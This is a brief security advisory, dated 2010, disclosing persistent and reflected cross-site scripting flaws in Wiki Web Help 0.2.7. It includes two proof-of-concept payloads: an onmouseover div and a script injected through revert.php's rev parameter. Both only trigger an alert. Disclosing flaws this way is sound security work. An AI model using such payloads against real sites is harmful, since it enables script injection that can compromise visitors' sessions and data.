------------------------------------------------------------------------
Software................Wiki Web Help 0.2.7
Vulnerability...........Persistent/Reflected XSS 
Download................http://sourceforge.net/projects/wwh/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to
execute arbitrary JavaScript.


--Exploit--

Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML
encode user submitted data.


--PoC--

Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E